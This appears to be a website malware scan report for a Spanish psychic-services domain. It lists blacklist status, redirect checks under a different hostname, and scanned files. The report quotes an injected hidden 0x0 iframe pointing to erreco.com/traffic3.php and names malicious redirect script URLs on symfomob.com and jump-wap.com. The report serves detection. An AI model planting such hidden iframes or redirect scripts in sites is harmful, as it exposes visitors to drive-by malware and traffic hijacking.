Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=videnteslabuenaesperanza.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jorrithorstman.nl
Result:
HTTP/1.1 302 Found
Connection: close
Date: Wed, 04 Mar 2015 08:27:10 GMT
Location: http://verwijzing.webreus.nl
Server: Apache/2.2.3 (CentOS)
Content-Length: 294
Content-Type: text/html; charset=iso-8859-1
...294 bytes of data.
GET / HTTP/1.1
Host: jorrithorstman.nl
Result:
HTTP/1.1 302 Found
Connection: close
Date: Wed, 04 Mar 2015 08:27:10 GMT
Location: http://verwijzing.webreus.nl
Server: Apache/2.2.3 (CentOS)
Content-Length: 294
Content-Type: text/html; charset=iso-8859-1
...294 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: jorrithorstman.nl
Referer: http://www.google.com/search?q=jorrithorstman.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: jorrithorstman.nl
Referer: http://www.google.com/search?q=jorrithorstman.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://videnteslabuenaesperanza.com/ | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://videnteslabuenaesperanza.com/test404page.js | 200 OK Content-Length: 42219 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: diplomnik24.ru <head><meta name="google-site-verification" content="xk-_RwGibumrjbF6jmNYrsYQOF416GoTNxLhio2GpWc" /></head>
<br /> <b>Warning</b>: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cookie - headers already sent by (output started at /home/content/93/11486693/html/samuel_vidente/index.php:2) in <b>/home/content/93/11486693/html/samuel_vidente ...[4540 bytes skipped]... Hidden iFrame found. size: 0x0 src: http://erreco.com/traffic3.php <iframe src="http://erreco.com/traffic3.php" width="0" height="0" frameborder="0"> | ||
http://videnteslabuenaesperanza.com/cache/jsn_vintage_pro/820f7a39240800d3fed086e20422ff48.js | 200 OK Content-Length: 101235 Content-Type: application/javascript | clean |
http://videnteslabuenaesperanza.com//ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js/ | 200 OK Content-Length: 42266 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: diplomnik24.ru <head><meta name="google-site-verification" content="xk-_RwGibumrjbF6jmNYrsYQOF416GoTNxLhio2GpWc" /></head>
<br /> <b>Warning</b>: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cookie - headers already sent by (output started at /home/content/93/11486693/html/samuel_vidente/index.php:2) in <b>/home/content/93/11486693/html/samuel_vidente ...[4528 bytes skipped]... Hidden iFrame found. size: 0x0 src: http://erreco.com/traffic3.php <iframe src="http://erreco.com/traffic3.php" width="0" height="0" frameborder="0"> | ||
http://videnteslabuenaesperanza.com/cache/jsn_vintage_pro/6ca49bc2609230d34a66a3649663b37a.js | 200 OK Content-Length: 8822 Content-Type: application/javascript | clean |
http://videnteslabuenaesperanza.com/cache/jsn_vintage_pro/b14d01f9462ce3c9c415614fbb60c422.js | 200 OK Content-Length: 238381 Content-Type: application/javascript | clean |
http://videnteslabuenaesperanza.com/cache/jsn_vintage_pro/26a36893b7c840392bd4317d9e555e4b.js | 200 OK Content-Length: 38399 Content-Type: application/javascript | clean |
http://videnteslabuenaesperanza.com/media/system/js/modal.js | 200 OK Content-Length: 9732 Content-Type: application/javascript | clean |
http://symfomob.com/js.php?sid=1783&traffic=all&mts_land=1&beeline_land=37&megafon_land=26 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 24 Feb 2015 15:56:25 GMT Pragma: no-cache Location: http://cdn10.jump-wap.com/?sid=1783&land=26&type=js Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=c978128d69748dee300dbd8b7f6b9d75; path=/ X-Powered-By: PHP/5.3.29 | malicious |
http://cdn10.jump-wap.com/?sid=1783&land=26&type=js | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://cdn10.jump-wap.com/test404page.js | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
http://symfomob.com/js.php?sid=1783&traffic=all&mts_land=76&beeline_land=28&megafon_land=26 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 24 Feb 2015 15:56:25 GMT Pragma: no-cache Location: http://cdn10.jump-wap.com/?sid=1783&land=26&type=js Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=b8260dea83deab46dbdf4a5afb6d527b; path=/ X-Powered-By: PHP/5.3.29 | malicious |
http://code.jquery.com/jquery-latest.js | 200 OK Content-Length: 282766 Content-Type: application/x-javascript | clean |